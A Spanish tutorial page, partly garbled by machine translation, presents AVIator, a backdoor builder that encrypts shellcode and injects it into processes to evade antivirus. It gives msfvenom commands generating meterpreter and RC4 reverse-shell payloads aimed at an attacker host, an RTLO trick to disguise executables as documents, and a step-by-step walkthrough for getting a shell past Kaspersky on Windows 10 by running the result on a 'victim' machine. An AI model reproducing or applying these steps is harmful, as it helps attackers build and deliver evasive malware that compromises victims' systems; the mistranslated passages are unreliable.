Tutoriales

Utilidad de construcción para eludir la detección de AV

Audiovisual|Actriz es una utilidad de generador de puerta trasera que utiliza técnicas de encriptación e inyección para eludir la detección de AV. Además:

  • Encripta el shellcode dado usando encriptación AES
  • Genere un ejecutable que contenga una carga útil cifrada
  • El shellcode se descifra y se inyecta en el sistema de destino utilizando varias técnicas de inyección.

[https://attack.mitre.org/techniques/T1055/]:

  1. Inyección ejecutable portátil, que consiste en escribir código malicioso directamente en el proceso (sin archivo en el disco), que luego se llama para su ejecución utilizando otro código o creando un hilo remoto. La permutación del código inyectado introduce requisitos adicionales para la capacidad de reasignar referencias de memoria. Las variaciones de este enfoque, como la inyección de DLL reflexiva (escribir una DLL autoasignada en un proceso) y los módulos de memoria (asignar una DLL a medida que se escribe en un proceso) superan el problema de reubicación de direcciones.
  2. Secuestro de ejecución de subprocesos, que consiste en inyectar código malicioso o rutas DLL en los subprocesos de un proceso. De manera similar al proceso de vaciado, primero se debe suspender el hilo.

uso

La aplicación tiene un formulario que consta de tres entradas principales (ver captura de pantalla a continuación):

  1. Texto que contiene la clave de cifrado utilizada para cifrar el shellcode
  2. Texto que contiene el IV para el cifrado AES
  3. Texto que contiene shellcode
LEER  Abierto en C

Nota IMPORTANTE: Shellcode debe proporcionarse como una matriz de bytes de C#.

El valor predeterminado contiene shellcode que ejecuta notepad.exe (32 bits). Esta demostración se proporciona para dar una indicación de cómo se debe formar el código (con msfvenom, esto se puede hacer fácilmente con el modificador -f csharp, por ejemplo, msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX -f csharp) .

Después de completar las entradas proporcionadas y seleccionar una ruta de salida, se generará un ejecutable de acuerdo con las opciones seleccionadas.

Opción RTLO

En resumen, falsificar un ejecutable para que parezca que tiene una extensión «inofensiva» como «pdf», «txt», etc. Por ejemplo, el archivo «testcod.exe» se interpretará como «tesexe.doc»

Tenga en cuenta que algunos antivirus advierten sobre falsificaciones con su propio malware.

establecer icono personalizado

Creo que todos saben lo que es 🙂

Omisión de Kaspersky AV en host Win 10 x64 (caso de prueba)

Obtenga un shell en una máquina con Windows 10 que ejecuta Kaspersky AV completamente actualizado

Máquina de destino: Windows 10 x64

  1. Crear carga útil con msfvenom msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
  2. Utilice la arquitectura del sistema operativo de destino de AVIator con la siguiente configuración: Técnica de inyección x64: secuestro de subprocesos (Shellcode Arch: x64, arquitectura del sistema operativo: x64) Programa de destino: explorer (mantener predeterminado)
  3. Configurar un oyente en la máquina de ataque
  4. Ejecute el exe resultante en la máquina de la víctima

Instalar

Ventanas:

compilar el proyecto o descargar ejecutable compilado

Linux:

Instale Mono de acuerdo con su distribución de Linux, descargue y ejecute los binarios

Por ejemplo en Cali:

   root@kali# apt install mono-devel 
   
   root@kali# mono aviator.exe

crédito

Damon Mohammadbagher de Encryptor

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba